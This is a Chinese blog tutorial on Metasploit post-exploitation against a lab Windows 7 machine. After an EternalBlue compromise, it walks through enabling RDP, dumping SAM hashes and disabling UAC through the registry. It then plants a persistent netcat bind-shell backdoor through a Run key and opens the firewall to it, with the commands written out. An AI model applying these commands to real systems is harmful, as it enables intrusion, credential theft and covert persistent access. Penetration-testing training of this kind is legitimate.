Metasploit 渗透测试之制作隐藏后门

Metasploit 渗透测试之制作隐藏后门,第1张

内容
  1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透
  2. 实战-Linux 无文件木马程序
  3. 实战-使用脚本来进行自动创建后门
  4. 系统日志清理
实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透

本次主要新增加了一些后渗透的步骤,先来回顾一下,永恒之蓝的利用过程
首先准备一台win7靶机最好与我们的kali在同一局域网中
打开msf

搜索相关可以利用的模块,选择对应的进行利用

查看一下需要配置的参数

这里只需要配置目标的ip地址

启动

成功拿到shell,我们来一个屏幕共享



下面进行后渗透,首先在win7主机上创建一个新用户来远程连接win7桌面
PDR概述:远程桌面协议,是一个多通道的协议,让用户连上提供微软终端机服务的电脑
将当前的会话存在后台运行

post/windows/manage/enable_rdp 这个模块可以帮我们启动目标主机的rdp服务,并且可以帮助我们自动创建rdp用户,另外还可以帮我们把目标主机的rdp端口映射到本地


创建rdp用户

下面我们指定sessionID,这里指定的sessionID一定是我们拿到shell的session

创建用户成功,我们在新开一个终端,来利用远程桌面进行连接


这时我们点击是,目标主机的使用用户就会被锁定


目标主机的界面,如果超过三十秒为做出选择,则会自动断开连接

成功连接到win7桌面

下面我们关闭主机防护策略并开启后门
通过ms17-010永恒之蓝获取到的shell可能会出现 *** 作受限的情况,所以我们使用主机的账户信息建立session 进行连接
这个时候可以认为我们把我们创建的用户当作跳板,进而去渗透其他的用户
SAM概述:SAM文件即账号密码数据库文件,SAM文件的位置是C:\Windows\System32\config\SAM
我们来到指定的文件目录进行查看

回到msf控制台,从SAM中导出密码哈希


取出我们自己创建的hack用户的密码哈希
hack:1006:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
创建一条防火墙规则允许4444端口访问网络,否则我饿们建立session时payload不能通过4444端口访问网络倒置建立session失败


UCA概述:用户账户控制(user account control) 是微软公司在其windows vista及更高版本 *** 作系统中采用的一种控制机制,其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意软件损坏系统的效果
下面我们手动关闭UCA

在命令行输入
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windwos\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

开启win7系统主机的默认共享,默认共享对Windows主机的文件共享非常方便,也方便黑客利用这个功能来远程执行命令

在命令行输入下面的命令
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

退出shell返回meterpreter中,我们先将session保存在后台
下面我们利用hash值登录系统,我们先选定指定的模块

我们给当前的模块配置参数

这里局域网中的SMBDomain 都是WORKGROUP 如果是域用户需要配置域名称

这时我们虽然用hack用户进行认证但是哦我们同样获取了SYSTEM权限

下面我们配置一个后门程序,修改UAC的注册表,需要重启才能生效
上传nc到win7中

注册表添加启动项执行nc反dshell命令

输入下面的命令
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d ‘C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe’

防火墙允许443端口访问网络否则开机的时候需要用户点击允许访问网络参可以执行成功

在windows的命令行中输入下面的命令
netsh advfirewall firewall add rule name=“xuegod443” protocol=TCP dir=in localport=443 action=allow
在命令行中输入命令重启目标主机

-r 表示重启
-f 表示强制
-t 表示时间为0的时刻
这个命令就是立即强制重启

需要用户进入系统后我们的后门程序才可以使用,在锁屏的界面我们后门程序还没有运行

查看一下后门程序

下面新建一个终端使用nc连接后门

下面是msf控制台的连接方法

到这里我们就成功的完成了后渗透的所有步骤,具体实战中应该随机应变
从上面的后渗透的各种 *** 作当中可以看得出来对于windows的用户进行渗透,我们也要掌握windows命令行的各种命令,否则我们拿到shell以后没办法维持稳定的shell连接

可能这就是windwos的漏洞的强大之处吧,无视任何杀软,只要系统版本对的上都ok

2.实战-Linux 无文件木马程序

累了,明天继续更

kali一开 全世界都是我的

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/796053.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-06
下一篇 2022-05-06

发表评论

登录后才能评论

评论列表(0条)

保存